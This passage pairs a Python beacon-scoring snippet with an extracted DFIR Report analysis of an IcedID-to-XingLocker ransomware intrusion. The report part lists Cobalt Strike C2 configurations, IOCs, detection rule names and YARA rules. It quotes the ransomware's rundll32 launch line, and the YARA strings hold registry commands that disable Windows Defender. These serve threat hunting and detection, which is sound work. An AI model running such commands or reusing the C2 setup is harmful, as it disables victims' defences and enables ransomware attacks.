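def percentile(sorted_vals, q):
    '''Nearest-rank percentile (q in 0..1) of an already sorted list.'''
    idx = round(q * (len(sorted_vals) - 1))
    return sorted_vals[idx]

def beacon_score(timestamps):
    '''0..1 score for how regular the gaps between connection start times are.
    Assumed simplification of RITA: mean of a skew term and a dispersion term.'''
    ts = sorted(timestamps)
    intervals = sorted(b - a for a, b in zip(ts, ts[1:]))
    if len(intervals) < 10:          # too few connections to say anything
        return 0.0
    q1, q2, q3 = (percentile(intervals, q) for q in (0.25, 0.5, 0.75))
    # Bowley skewness: 0 when the gaps are spread symmetrically around the median
    # (a fixed sleep with uniform jitter), approaching +-1 when they are lopsided.
    spread = q3 - q1
    skew = 0.0 if spread == 0 else (q3 + q1 - 2 * q2) / spread
    skew_score = 1.0 - abs(skew)
    # Median absolute deviation relative to the median gap: small when gaps cluster tightly.
    mad = statistics.median(abs(x - q2) for x in intervals)
    mad_score = max(0.0, 1.0 - mad / q2) if q2 > 0 else 0.0
    return round((skew_score + mad_score) / 2, 3)

def cobalt_strike_times(sleep_ms, jitter_pct, n, seed=7):
    '''Connection start times (seconds) for a Beacon with the given sleep and jitter.
    Cobalt Strike shortens each sleep by a random 0..jitter percent.'''
    rng = random.Random(seed)
    t, out = 0.0, []
    for _ in range(n):
        out.append(t)
        t += sleep_ms * (1 - rng.uniform(0, jitter_pct / 100)) / 1000
    return out

def browsing_times(mean_gap_s, n, seed=7):
    '''Constructed comparison traffic: Poisson-style arrivals with the same average gap.'''
    rng = random.Random(seed)
    t, out = 0.0, []
    for _ in range(n):
        out.append(t)
        t += rng.expovariate(1 / mean_gap_s)
    return out

# kaslose.com Beacon settings from the config above: SleepTime 4000 ms, Jitter 37.
BEACON_SCORE = beacon_score(cobalt_strike_times(4000, 37, 2000))
BROWSING_SCORE = beacon_score(browsing_times(3.26, 2000))

if __name__ == '__main__':
    print('Beacon, 4000 ms sleep, 37 percent jitter:', BEACON_SCORE)
    print('Constructed browsing traffic:            ', BROWSING_SCORE)
```

The Beacon scores close to 0.9 even with 37 percent jitter, because uniform jitter keeps the gaps symmetric and tightly clustered, while the browsing sample lands around 0.5. In practice the timestamps are the conn.log ts values for one source/destination pair, and, exactly as the report says, a high score is a hunting lead to enrich and filter, not a verdict.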
RITA consumes Zeek/Bro logs and detects suspected beaconing activity using calculations over the network traffic. It then assigns a score from 0.1 to 1.0, where a higher score indicates more suspicious network activity.\r\nRITA is used as a hunting tool rather than a real-time detection tool, though simple scripting allows RITA to be used for live traffic analysis. However, analysts should add additional context and filter the results accordingly. RITA can only identify suspicious communication and should not be automated as a preventative control. For more info on how RITA works, check out the mathematics here.\r\nUsing the network traffic from this case, RITA was able to identify all active Beacons from the impacted hosts in the network, as seen in the screenshot below:\r\nIcedID:\r\ngsterangsic.buzz\r\noscanonamik.club\r\nriderskop.top\r\niserunifish.club\r\n5.61.46.161\r\n176.97.64.194\r\nJA3:a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s:ec74a5c51106f0419184d0dd08fb05bc\r\nCertificate: [f8:4e:05:70:39:7b:8a:81:d3:0e:09:be:3c:68:14:00:d2:6d:8c:07]\r\nNot Before: 2021/07/21 14:07:11 UTC\r\nNot After: 2022/07/21 14:07:11 UTC\r\nIssuer Org: Internet Widgits Pty Ltd\r\nSubject Common: localhost\r\nSubject Org: Internet Widgits Pty Ltd\r\nPublic Algorithm: rsaEncryption\r\nJA3:a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s:ec74a5c51106f0419184d0dd08fb05bc\r\nCertificate: [87:19:1c:7c:0f:4e:e0:96:5c:b4:c9:de:a0:41:47:dd:5a:ef:4e:c4]\r\nNot Before: 2021/07/21 06:53:48 UTC\r\nNot After: 2022/07/21 06:53:48 UTC\r\nIssuer Org: Internet Widgits Pty Ltd\r\nSubject Common: localhost\r\nSubject Org: Internet Widgits Pty Ltd\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike C2 configuration:\r\nkaslose.com (146.70.24.186) – This Cobalt Strike server was added to our Threat Feed on 07/19/2021.\r\nJA3:a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s:ae4edc6faf64d08308082ad26be60767\r\nCertificate: [7e:6c:72:b8:83:e3:9f:28:e0:af:06:45:2b:73:73:f1:86:89:cc:d7]\r\nNot Before: 2021/07/20 15:53:12 UTC\r\nNot After: 2021/10/18 15:53:10 UTC\r\nIssuer Org: Let's Encrypt\r\nSubject Common: kaslose.com [kaslose.com ]\r\nPublic Algorithm: rsaEncryption\r\n{\r\n \"x64\": {\r\n \"sha256\": \"8cbd66dd196a5c54549dc350fa1734dddcff2da782a4a0682e8a79de7bbdf505\",\r\n \"sha1\": \"65c4379c9bcca13c4e357bf6cc60af4ced8090a2\",\r\n \"uri_queried\": \"/4Ovd\",\r\n \"config\": {\r\n \"Watermark\": 0,\r\n \"Method 2\": \"POST\",\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n \"C2 Host Header\": \"\",\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n \"C2 Server\": \"kaslose.com,/jquery-3.3.1.min.js\",\r\n \"Jitter\": 37,\r\n \"Method 1\": \"GET\",\r\n \"Port\": 443,\r\n \"Polling\": 4000\r\n },\r\n \"time\": 1629006465815.1,\r\n \"md5\": \"af56c32d3d6e5ffa8b20a97580e59656\"\r\n },\r\n \"x86\": {\r\n \"sha256\": \"56ab98d818638b3108505e9778c2c0d021b9f71f882abf1626098780560e435d\",\r\n \"sha1\": \"c216520a8b30894cbd529bfb805dca7c253b85f6\",\r\n \"uri_queried\": \"/HjIa\",\r\n \"config\": {\r\n \"Watermark\": 0,\r\n \"Method 2\": \"POST\",\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n \"C2 Host Header\": \"\",\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n \"C2 Server\": \"kaslose.com,/jquery-3.3.1.min.js\",\r\n \"Jitter\": 37,\r\n \"Method 1\": \"GET\",\r\n \"Port\": 443,\r\n \"Polling\": 4000\r\n },\r\n \"time\": 1629006464435.3,\r\n \"md5\": \"5fe82e1ccc5a68c39f314aad79f16cbb\"\r\n }\r\n}\r\nThe following Cobalt Strike servers were added to our Threat Feed on 
07/26/2021.\r\ncdnsharepoi.xyz\r\ncdnchrome.xyz\r\n134.195.90.187:80\r\n134.195.90.186:80\r\n134.195.90.185:80\r\nHTTP User Agent:\r\nMozilla/5.0 (Windows NT 6.2; WOW64; Trident/5.0; rv:11.0) like Gecko 20210505604\r\nJA3:a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s:fd4bc6cea4877646ccd62f0792ec0b62\r\nCertificate: [5c:d1:8b:c9:51:f2:5b:ed:ad:fe:6a:1e:c8:9c:ec:7f:29:12:7b:b2]\r\nNot Before: 2021/06/07 17:50:37 UTC\r\nNot After: 2021/09/05 17:50:37 UTC\r\nIssuer Org: Let's Encrypt\r\nSubject Common: cdnwin.xyz [cdnwin.xyz ]\r\nPublic Algorithm: rsaEncryption\r\nBased on the Subject Common Name (cdnwin.xyz) we can see that there are 5 Cobalt Strike servers associated with this group, all hosted on HostHatch and registered through NameCheap. They were still online as of 10/10/2021.\r\n{\r\n \"BeaconType\": [\r\n \"HTTP\"\r\n ],\r\n \"Port\": 80,\r\n \"SleepTime\": 10000,\r\n \"MaxGetSize\": 1398191,\r\n \"Jitter\": 10,\r\n \"C2Server\": \"134.195.90.186,/updates/query_result.php,134.195.90.185,/updates/query_result.php,cdnchrome.xyz,/updates/\r\n \"HttpPostUri\": \"/updates/lims.php\",\r\n \"Malleable_C2_Instructions\": [\r\n \"Remove 21 bytes from the end\",\r\n \"Remove 66 bytes from the beginning\",\r\n \"Base64 decode\"\r\n ],\r\n \"SpawnTo\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"HttpGet_Verb\": \"GET\",\r\n \"HttpPost_Verb\": \"POST\",\r\n \"HttpPostChunk\": 0,\r\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\svchost.exe\",\r\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\svchost.exe\",\r\n \"CryptoScheme\": 0,\r\n \"Proxy_Behavior\": \"Use IE settings\",\r\n \"Watermark\": 0,\r\n \"bStageCleanup\": \"False\",\r\n \"bCFGCaution\": \"False\",\r\n \"KillDate\": 0,\r\n \"bProcInject_StartRWX\": \"True\",\r\n \"bProcInject_UseRWX\": \"True\",\r\n \"bProcInject_MinAllocSize\": 16384,\r\n \"ProcInject_PrependAppend_x86\": [\r\n \"kJA=\",\r\n \"Empty\"\r\n ],\r\n 
\"ProcInject_PrependAppend_x64\": \"Empty\",\r\n \"ProcInject_Execute\": [\r\n \"ntdll.dll:RtlUserThreadStart\",\r\n \"SetThreadContext\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"ProcInject_AllocationMethod\": \"VirtualAllocEx\",\r\n \"bUsesCookies\": \"False\",\r\n \"HostHeader\": \"\"}\r\ncroperdate.com (146.70.24.133:443) - This Cobalt Strike server was added to our Threat Feed on 07/27/2021.\r\nJA3:a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s:ae4edc6faf64d08308082ad26be60767\r\nCertificate: [32:c6:10:53:d8:b9:78:25:57:24:fc:d0:a3:13:a1:02:fe:5a:69:e9]\r\nNot Before: 2021/07/27 10:49:01 UTC\r\nNot After: 2021/10/25 10:48:59 UTC\r\nIssuer Org: Let's Encrypt\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 16 of 24\n\nSubject Common: croperdate.com [croperdate.com ]\r\nPublic Algorithm: rsaEncryption\r\n\"x64\": {\r\n \"md5\": \"e830976cb63c0741f77d03e2380be20f\",\r\n \"sha256\": \"83b06b64509af99fb9c467149b00f1110249762f8afe611e37f60958e074d1ba\",\r\n \"config\": {\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n \"Method 2\": \"POST\",\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n \"Method 1\": \"GET\",\r\n \"Jitter\": 37,\r\n \"C2 Server\": \"croperdate.com,/jquery-3.3.1.min.js\",\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"Port\": 443,\r\n \"Polling\": 5000\r\n },\r\n \"time\": 1627388580602.7,\r\n \"sha1\": \"b3cd1f976ed13ec2bc0abeef7ecea309c0c5461c\"\r\n },\r\n \"x86\": {\r\n \"md5\": \"a5449d92756386dd749a8013d5267f14\",\r\n \"sha256\": \"8da83bde3f4e7643a30ab818093981acef7e8870080db60a98286a1d9624dda1\",\r\n \"config\": {\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n \"Method 2\": \"POST\",\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n \"Method 1\": \"GET\",\r\n \"Jitter\": 37,\r\n \"C2 Server\": 
\"croperdate.com,/jquery-3.3.1.min.js\",\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"Port\": 443,\r\n \"Polling\": 5000\r\n },\r\n \"time\": 1627388577368.7,\r\n \"sha1\": \"25a797d4679c40c1599949356cec9e350fdd5588\"\r\n }\r\nExfiltration\r\nNo exfiltration TTPs were observed while analyzing this intrusion, however, as stated in the case summary, it is possible that\r\nthe threat actors used Cobalt Strike (encrypted channel) to transmit sensitive data such as Word documents.\r\nImpact\r\nThe ransomware was executed on multiple servers using a batch script start.bat :\r\n@echo off\r\nrundll32 c:\\users\\public\\music\\update64.dll,start\r\nHere is the first ransomware execution which was observed on the Domain Controller:\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 17 of 24\n\nBelow is another example of the ransomware execution on one of the external servers:\r\nOnce the encryption process was complete a file called RecoveryManual.html was left across the filesystem with the\r\ninstructions on how to contact the threat actors for the ransom negotiations.\r\nIOCs\r\nNetwork\r\nIcedID C2\r\n37.120.222.100\r\n176.97.64.194 calseled.bond\r\n176.97.64.194 riderskop.top\r\nfeedbackfileweb.club\r\n5.61.46.161 gsterangsic.buzz\r\nCobalt Strike C2\r\n146.70.24.133 croperdate.com\r\n146.70.24.186 kaslose.com\r\n134.195.90.187 cdnsharepoi.xyz\r\n134.195.90.187 cdngithub.xyz\r\n134.195.90.187 cdnwindow.xyz\r\n134.195.90.187 cdnchrome.xyz\r\n134.195.90.187 cdnwin.xyz\r\n134.195.90.186 cdnwin.xyz\r\n134.195.90.185 cdnwin.xyz\r\nFile\r\n0B330A76.bat\r\n348cae913e496198548854f5ff2f6d1e\r\na07655b9020205bd47084afd62a8bb22b48c0cdc\r\nc80128f51871eec3ae2057989a025ce244277c1c180498a5aaef45d5214b8506\r\nadf.bat\r\nc0fba1bdf26fdea254f29d035cfcb240\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 18 of 
24\n\n76e49a572c2b468ff75387d340b871799fb514c0\r\n9a07559dd43d8defa9addf1d61d401cdecc121c3fd03789905c086875cbb918c\r\ncroperdate64.dll\r\n67c916ed405a3163d19f7642734d94be\r\n6f0edb57f316fd75a96c1365e7408cc51b165c1a\r\n1b981b4f1801c31551d20a0a5aee7548ec169d7af5dbcee549aa803aeea461a0\r\nfed1.bat\r\nb849c3fde795b901244033039b8ac7fc\r\n82226be6991b327a88f2e34d306e85fef3dc1a7c\r\n81a1247465ed4b6a44bd5b81437024469147b75fe4cb16dc4d2f7b912463bf12\r\nfed2.bat\r\n450319cd558fb091de5c1eb477279491\r\nb9be7387ad2363f240d6f9758565310bc070c5d8\r\nbf908d50760e3724ed5faa29b2a96cb1c8fc7a39b58c3853598d8b1ccfd424ac\r\nfed3.bat\r\nd66e39105b8c13e530e3965f058d74e1\r\nc94d92056db72aeac6d5c37e8f87b7be63065b25\r\n8dced0ed6cba8f97c0b01f59e063df6be8214a1bd510e4774ef7f30c78875f4e\r\nkaslose.dll\r\n922451995226138f5924a830e58dcf84\r\n05036842cc0faf1fe3c539e984af4ca96fb4478b\r\n320296ea54f7e957f4fc8d78ec0c1658d1c04a22110f9ddffa6e5cb633a1679c\r\nkaslose64.dll\r\n71d852063d97be95b841244ba2baa3b3\r\n1640828e4158ca867e35c4c2bd75fc7d2c32e82b\r\na4d92718e0a2e145d014737248044a7e11fb4fd45b683fcf7aabffeefa280413\r\nkasper.bat\r\nf72cab42a2ecb753e9cf1eca0fda9b75\r\nb0a303a9c5844aad78deafaa469f091d0fe78884\r\nfc2ab02ff0774921f49a1f78782a9c2634bacc76c149d5d16ab861ca9ce5d760\r\nspoolsv.exe\r\nbac8f1ac15380266049c693093350710\r\nef7ec279ef8bdca900f1190db945ad3f15d4f983\r\n0d575c22dfd30ca58f86e4cf3346180f2a841d2105a3dacfe298f9c7a22049a0\r\nstar.bat\r\nedc09807da2d733262c29f0fb184c6c2\r\n70dd6c21d031db5051a3635b8860c3a494c866ff\r\n6679848b93987eb8ca02f881e3542b9f54163264b18a13175b65e18ba711c905\r\nupdate64.dll\r\nffd1027dad6ba3eec0a8de67f9236d05\r\n61707322b2f5bb49dff51520fb0f9da866987153\r\n47ff886d229a013d6e73d660a395f7b8e285342195680083eb96d64c052dd5f0\r\nDetections\r\nNetwork\r\nSuricata\r\nET MALWARE Win32/IcedID Request Cookie\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)\r\nET DNS Query to a *.top domain - Likely Hostile\r\nThreatFox TrickBot botnet C2 traffic (ip:port - confidence level: 
75%)\r\nETPRO POLICY Observed Atera Remote Access Application Activity Domain in TLS SNI\r\nET INFO Observed Let's Encrypt Certificate for Suspicious TLD (.xyz)\r\nThreatFox IcedID botnet C2 traffic (ip:port - confidence level: 75%)\r\nFeodo Tracker: potential TrickBot CnC Traffic detected\r\nET TROJAN Trickbot Checkin Response\r\nET INFO Dotted Quad Host DLL Request\r\nET INFO Suspicious Windows Commands in POST Body (ipconfig)\r\nET INFO Suspicious Windows Commands in POST Body (net config)\r\nET INFO Suspicious Windows Commands in POST Body (net view)\r\nET INFO Suspicious Windows Commands in POST Body (nltest)\r\nET POLICY IP Check Domain (icanhazip. com in HTTP Host)\r\nET POLICY PE EXE or DLL Windows file download HTTP\r\nET TROJAN Win32/IcedID Request Cookie\r\nET TROJAN Win32/Trickbot Data Exfiltration\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 19 of 24\n\nSigma\r\nAbused Debug Privilege by Arbitrary Parent Processes –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/sysmon_abusing_debug_pr\r\nAutomated Collection Command Prompt –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/process_creation_automated_collection.yml\r\nBad Opsec Powershell Code Artifacts –\r\nhttps://github.com/SigmaHQ/sigma/blob/5e35e387dd0dcdd564db7077da3470fbc070b975/rules/windows/powershell/powershell_bad_opsec_artifacts.\r\nBloodhound and Sharphound Hack Tool –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_hack_bloodhound.yml\r\nCobaltStrike Process Patterns –\r\nhttps://github.com/SigmaHQ/sigma/blob/ee85fdfa3fda3d2861065f0e2f6a9d599b03e47e/rules/windows/process_creation/win_cobaltstrike_process_pa\r\nCobaltStrike Service Installations –\r\nhttps://github.com/SigmaHQ/sigma/blob/1b480f2ee609e196fcaf6bfee11cf26133f64435/rules/windows/builtin/win_cobaltstrike_service_installs.yml\r\nCobaltStrike Service 
Installations in Registry –\r\nhttps://github.com/SigmaHQ/sigma/blob/bbe67ddc73adaa245941fe240db4eff3279078a8/rules/windows/registry_event/sysmon_cobaltstrike_service_i\r\nEmpire PowerShell Launch Parameters –\r\nhttps://github.com/SigmaHQ/sigma/blob/7c42a9d6cbe8af82b1df3cdde67b9adf9f86ffa1/rules/windows/process_creation/win_susp_powershell_empire\r\nExecution from Suspicious Folder –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_execution_path.y\r\nFile Created with System Process Name –\r\nhttps://github.com/SigmaHQ/sigma/blob/ea430c8823803b9026a4e6e2ea7365dc5d96f385/rules/windows/file_event/sysmon_creation_system_file.yml\r\nFile or Folder Permissions Modifications –\r\nhttps://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_file_permission_modifi\r\nFirst Time Seen Remote Named Pipe –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/builtin/win_lm_namedpipe.yml\r\nLocal Accounts Discovery –\r\nhttps://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_local_system_owner_ac\r\nMalicious Base64 Encoded PowerShell Keywords in Command Lines –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_hidd\r\nMalicious PowerShell Commandlets –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/powershell/powershell_malicious_command\r\nMimikatz Detection LSASS Access –\r\nhttps://github.com/SigmaHQ/sigma/blob/b81839e3ce507df925d6e583e569e1ac3a3894ab/rules/windows/deprecated/sysmon_mimikatz_detection_lsas\r\nNet.exe Execution –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_net_execution.ym\r\nNon Interactive PowerShell 
–\r\nhttps://github.com/SigmaHQ/sigma/blob/1425ede905514b7dbf3c457561aaf2ff27274724/rules/windows/process_creation/win_non_interactive_power\r\nPowerShell as a Service in Registry –\r\nhttps://github.com/SigmaHQ/sigma/blob/a80c29a7c2e2e500a1a532db2a2a8bd69bd4a63d/rules/windows/registry_event/sysmon_powershell_as_servic\r\nPowerShell Execution –\r\nhttps://github.com/SigmaHQ/sigma/blob/8aabb58eca06cc44ae21ae4d091793d8c5ca6a23/rules/windows/image_load/sysmon_powershell_execution_m\r\nPowerShell Network Connections –\r\nhttps://github.com/SigmaHQ/sigma/blob/7f071d785157dfe185d845fad994aa6ec05ac678/rules/windows/network_connection/sysmon_powershell_net\r\nPowerShell Scripts Installed as Services –\r\nhttps://github.com/SigmaHQ/sigma/blob/a80c29a7c2e2e500a1a532db2a2a8bd69bd4a63d/rules/windows/builtin/win_powershell_script_installed_as_s\r\nRare Scheduled Task Creations –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/other/win_rare_schtask_creation.yml\r\nRare Service Installs –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/builtin/win_rare_service_installs.yml\r\nRegsvr32 Anomaly –\r\nhttps://github.com/SigmaHQ/sigma/blob/6fbce11094285e5ba13fe101b9cb70f5b1ece198/rules/windows/process_creation/win_susp_regsvr32_anomal\r\nRegsvr32 Command Line Without DLL –\r\nhttps://github.com/SigmaHQ/sigma/blob/7c42a9d6cbe8af82b1df3cdde67b9adf9f86ffa1/rules/windows/process_creation/win_susp_regsvr32_no_dll.ym\r\nRegsvr32 Network Activity –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_regsvr32_netw\r\nRundll32 Internet Connection –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_rundll32_net_c\r\nRyuk Ransomware 
–\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_malware_ryuk.yml\r\nSMB Create Remote File Admin Share –\r\nhttps://github.com/SigmaHQ/sigma/blob/8beb70e970b814d0ab60625206ea0d8a21a9bff8/rules/windows/builtin/win_smb_file_creation_admin_shares\r\nStop Windows Service –\r\nhttps://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_service_stop.yml\r\nSuccessful Overpass the Hash Attempt –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/builtin/win_overpass_the_hash.yml\r\nSuspicious AdFind Execution –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_adfind.yml\r\nSuspicious Encoded PowerShell Command Line –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_enc_\r\nSuspicious In-Memory Module Execution –\r\nhttps://github.com/SigmaHQ/sigma/blob/5cf7078fb3d61f2c15b01d9426f07f9197dd3db1/rules/windows/process_access/sysmon_in_memory_assembl\r\nSuspicious PowerShell Cmdline –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/powershell/powershell_cmdline_reversed_st\r\nSuspicious PowerShell Parent Process –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_pare\r\nSuspicious Spool Service Child Process –\r\nhttps://github.com/SigmaHQ/sigma/blob/0b83c12dd1fcc906ce705c413d5ed5db90ce5e82/rules/windows/process_creation/win_susp_spoolsv_child_pr\r\nSuspicious WMI Execution –\r\nhttps://github.com/SigmaHQ/sigma/blob/5e701a2bcb353338854c8ab47de616fe7e0e56ff/rules/windows/process_creation/win_susp_wmi_execution.y\r\nWindows Defender Threat Detection Disabled 
–\r\nhttps://github.com/SigmaHQ/sigma/blob/f69868b5aa25f33c629208d8868994ed24b20b46/rules/windows/other/win_defender_disabled.yml\r\nWindows PowerShell Web Request –\r\nhttps://github.com/SigmaHQ/sigma/blob/9b7be5985ea6079e97a2a769404880fc9dd63994/rules/windows/powershell/win_powershell_web_request.ym\r\nYara\r\n/*\r\n YARA Rule Set\r\n Author: The DFIR Report\r\n Date: 2021-10-10\r\n Identifier: 5582 Xinglocker\r\n Reference: https://thedfirreport.com/\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\nrule DLLBeacons {\r\n meta:\r\n description = \"for files: kaslose64.dll, spoolsv.exe, kaslose.dll, croperdate64.dll\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-09-14\"\r\n hash1 = \"a4d92718e0a2e145d014737248044a7e11fb4fd45b683fcf7aabffeefa280413\"\r\n hash2 = \"0d575c22dfd30ca58f86e4cf3346180f2a841d2105a3dacfe298f9c7a22049a0\"\r\n hash3 = \"320296ea54f7e957f4fc8d78ec0c1658d1c04a22110f9ddffa6e5cb633a1679c\"\r\n hash4 = \"1b981b4f1801c31551d20a0a5aee7548ec169d7af5dbcee549aa803aeea461a0\"\r\n strings:\r\n $s1 = \"f14m80.dll\" fullword ascii\r\n $s2 = \"\\\\dxdiag.exe\" fullword ascii\r\n $s3 = \"\\\\regedit.exe\" fullword ascii\r\n $s4 = \"\\\\notepad.exe\" fullword ascii\r\n $s5 = \"\\\\mmc.exe\" fullword ascii\r\n $s6 = \"spawn::resuming thread %02d\" fullword ascii\r\n $s7 = \"xYYyQDllwAZFpV51\" fullword ascii\r\n $s8 = \"thread [%d]: finished\" fullword ascii\r\n $s9 = \"wmi: error initialize COM security\" fullword ascii\r\n $s10 = \"error initializing COM\" fullword ascii\r\n $s11 = \"spawn::first wait failed: 0x%04x\" fullword ascii\r\n $s12 = \"wmi: connect to root\\\\cimv2 failed: 0x%08x\" fullword ascii\r\n $s13 = \"jmPekFtanAOGET_5\" fullword ascii\r\n $s14 = \"spawn::decrypted\" fullword ascii\r\n $s15 = \"eQ_Jt_fIrCE85LW3\" fullword ascii\r\n $s16 = \"dBfdWB3uu8sReye1\" fullword ascii\r\n 
$s17 = \"qpp0WQSPyuCnCEm3\" fullword ascii\r\n $s18 = \"zn9gkPgoo_dOORd3\" fullword ascii\r\n $s19 = \"wmi: probaly running on sandbox\" fullword ascii\r\n $s20 = \"spawn::finished\" fullword ascii\r\n condition:\r\n ( uint16(0) == 0x5a4d and filesize \u003c 2000KB and ( 8 of them )\r\n ) or ( all of them )\r\n}\r\nrule fed3_fed2_4 {\r\n meta:\r\n description = \"for files: fed3.bat, fed2.bat\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-09-14\"\r\n hash1 = \"8dced0ed6cba8f97c0b01f59e063df6be8214a1bd510e4774ef7f30c78875f4e\"\r\n hash2 = \"bf908d50760e3724ed5faa29b2a96cb1c8fc7a39b58c3853598d8b1ccfd424ac\"\r\n strings:\r\n $s1 = \"reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\DefenderAuditLogger\\\" /v \\\"Start\\\" /t RE\r\n $s2 = \"reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\DefenderApiLogger\\\" /v \\\"Start\\\" /t REG_\r\n $s3 = \"reg delete \\\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\" /v \\\"Windows Defender\\\" /f\" fullword a\r\n $s4 = \"reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\" /v \\\"Start\\\" /t REG_DWORD /d \\\"4\\\" /f\" fullw\r\n $s5 = \"reg delete \\\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\" /v \\\"WindowsDefender\\\" /f\" fullword as\r\n $s6 = \"reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WdFilter\\\" /v \\\"Start\\\" /t REG_DWORD /d \\\"4\\\" /f\" fullwo\r\n $s7 = \"reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WdNisSvc\\\" /v \\\"Start\\\" /t REG_DWORD /d \\\"4\\\" /f\" fullwo\r\n $s8 = \"reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WdBoot\\\" /v \\\"Start\\\" /t REG_DWORD /d \\\"4\\\" /f\" fullword\r\n $s9 = \"reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SecurityHealthService\\\" /v \\\"Start\\\" /t REG_DWORD /d \\\"4\r\n $s10 = \"reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WdNisDrv\\\" /v 
